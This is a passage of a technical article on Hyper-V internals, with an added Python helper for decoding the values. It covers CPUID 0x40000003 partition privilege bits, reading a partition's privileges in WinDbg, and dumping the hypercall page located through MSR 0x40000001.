<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">CPUID 40000003 called</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EAX = 00000E7F (00001110 01111111)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 0: VP Runtime (HV_X64_MSR_VP_RUNTIME)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1: Partition Reference Counter (HV_X64_MSR_TIME_REF_COUNT)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 2: Basic SynIC MSRs (HV_X64_MSR_SCONTROL through HV_X64_MSR_EOM and HV_X64_MSR_SINT0 through HV_X64_MSR_SINT15)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 3: Synthetic Timer MSRs (HV_X64_MSR_STIMER0_CONFIG through HV_X64_MSR_STIMER3_COUNT) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4: APIC access MSRs (HV_X64_MSR_EOI, HV_X64_MSR_ICR and HV_X64_MSR_TPR) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5: Hypercall MSRs (HV_X64_MSR_GUEST_OS_ID and HV_X64_MSR_HYPERCALL) </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 6: Access virtual processor index MSR (HV_X64_MSR_VP_INDEX)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX = 000008B0 (00001000 10110000)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 11:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ECX = 00000002 (00000000 00000010)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Maximum Processor Power State is C2</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EDX = 000007B2 (00000111 10110010)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 1:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Guest debugging support is available</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for passing hypercall input parameter block via XMM registers is available</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Support for a virtual guest idle state is available</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For a Windows 10 x86 guest running on Windows Server 2016 TP2, the privileges reported in EBX were extended:</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">EBX = 003880B0 (1110001000000010110000)</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 4:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PostMessages</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 5:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">SignalEvents</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 7:</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ConnectPort</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 15: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 19: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 20: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; text-align: justify; text-indent: 35.35pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bit 21: Unknown</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The privileges marked Unknown are not mentioned in TLFS 4.0.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The privileges of the partition whose operation caused the VM exit can be found by starting from the hypervisor's gs:0 base: read the HOST_GS_BASE field of the VMCS or the IA32_GS_BASE MSR:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>rdmsr 0xc0000101 </span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[c0000101] = fffff800`05464000</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then take the pointer stored at gs:82e8 and look at offset 0xd8 from it:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc poi(fffff800`05464000+82e8)+0xd8</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`04dd70d8 </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00001fff 000039ff</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 ffffe800 .....9..........</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000080`04dd70e8 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In this case, the VM exit came from the root partition.</span></div>
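<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two listings above (the CPUID 0x40000003 bit tables for the guest and the privilege qword read via gs:82e8 + 0xd8 for the root partition) can be decoded with a small helper. The script below is an added example and is not code from the article; the bit names are exactly the ones the article gives, bits the article does not name are reported as Unknown, and the assumption that the dumped qword has the same low-dword/high-dword layout as CPUID 0x40000003 EAX/EBX is mine.</span></div>

```python
"""Decode the Hyper-V partition privilege / feature bits shown in the article.

Added example (not code from the article): the bit names come from the
article's own lists; the rest is a plain helper for WinDbg output.
"""

# CPUID 0x40000003 EBX partition privileges as named in the article; bits the
# article lists as "Unknown" (15, 19, 20, 21) are deliberately left unnamed.
EBX_PRIVILEGES = {
    4: "PostMessages",
    5: "SignalEvents",
    7: "ConnectPort",
    11: "Debugging",
}

# CPUID 0x40000003 EDX feature bits as named in the article.
EDX_FEATURES = {
    1: "Guest debugging support is available",
    4: "Support for passing hypercall input parameter block via XMM registers is available",
    5: "Support for a virtual guest idle state is available",
}


def set_bits(value):
    """Return the indexes of all bits set in value, lowest first."""
    return [bit for bit in range(value.bit_length()) if value & (1 << bit)]


def decode_flags(value, names, unknown="Unknown"):
    """Map each set bit to its name, like the 'Bit N: Name' lists in the article."""
    return [(bit, names.get(bit, unknown)) for bit in set_bits(value)]


def max_power_state(ecx):
    """CPUID 0x40000003 ECX bits 3:0 carry the maximum processor power state
    (the article shows ECX = 2, i.e. C2)."""
    return f"C{ecx & 0xF}"


def parse_dc_line(line):
    """Parse one WinDbg 'dc' output line (address, four dwords, ASCII column)
    into (address, [dword, ...]); backticks inside the address are allowed."""
    tokens = line.split()
    address = int(tokens[0].replace("`", ""), 16)
    dwords = [int(tok, 16) for tok in tokens[1:5]]
    return address, dwords


def privilege_mask_from_dump(line):
    """Rebuild the 64-bit privilege mask from the first two dwords of the dc
    line. Assumption (mine, not the article's): low dword = EAX-style MSR
    access flags, high dword = EBX-style partition privileges."""
    _, dwords = parse_dc_line(line)
    return (dwords[1] << 32) | dwords[0]


def privilege_diff(guest_ebx, root_ebx):
    """Privilege bits held by only one side: (root-only bits, guest-only bits)."""
    guest, root = set(set_bits(guest_ebx)), set(set_bits(root_ebx))
    return sorted(root - guest), sorted(guest - root)


# Values copied from the article: the guest's CPUID 0x40000003 registers and
# the root partition's privilege qword dumped at gs:82e8 + 0xd8.
GUEST_EBX = 0x003880B0
GUEST_ECX = 0x00000002
GUEST_EDX = 0x000007B2
ROOT_DC_LINE = "00000080`04dd70d8 00001fff 000039ff 00000000 ffffe800 .....9.........."

if __name__ == "__main__":
    for bit, name in decode_flags(GUEST_EBX, EBX_PRIVILEGES):
        print(f"EBX bit {bit}: {name}")
    print("Maximum processor power state:", max_power_state(GUEST_ECX))
    for bit, name in decode_flags(GUEST_EDX, EDX_FEATURES, "not named in the article"):
        print(f"EDX bit {bit}: {name}")
    mask = privilege_mask_from_dump(ROOT_DC_LINE)
    print(f"Root partition privilege mask: {mask:#018x}")
    root_only, guest_only = privilege_diff(GUEST_EBX, mask >> 32)
    print("Root-only privilege bits:", root_only, "guest-only bits:", guest_only)
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run against the values from the article, privilege_diff shows that the root partition holds Debugging (bit 11) and the guest does not, while the guest carries the four bits that TLFS 4.0 does not describe; comparing the two masks this way is a quick check of what a partition is allowed to ask the hypervisor for.</span></div>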
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In each partition the hypervisor sets up a special page through which hypercalls are issued. Its address can be obtained by reading MSR 0x40000001 (HV_X64_MSR_HYPERCALL):</span></div>
<div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 7 x86 on Windows Server 2012:</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 8 x86 on Windows Server 2016 TP2:</span></div>
</td></tr>
<tr style="height: 81px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> rdmsr 0x40000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[40000001] = 00000000`1ffb1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 00000000`1ffb1001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffb1000 c3c1010f 90909090 90909090 90909090 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">#1ffb1010 90909090 90909090 90909090 90909090 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As you can see, 0xc3c1010f is the little-endian encoding of the bytes 0f 01 c1 c3, i.e. the opcodes of vmcall; ret.</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> rdmsr 0x40000001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">msr[40000001] = 00000000`00004001</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !dc 4000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4000 c3c1010f 11b8c88b 0f000000 48c3c101 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4010 c748c18b 000011c1 c1010f00 b8c88bc3 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4020 00000012 c3c1010f 48c18b48 0012c1c7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># 4030 010f0000 9090c3c1 90909090 90909090 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> up 4000 L50</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004000 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004003 c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004004 8bc8 mov ecx,eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004006 b811000000 mov eax,11h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400b 0f01c1 vmcall</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400e c3 ret</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0000400f 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004010 8bc1 mov eax,ecx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004012 48 dec eax</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00004013 c7c111000000 mov ecx,11h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
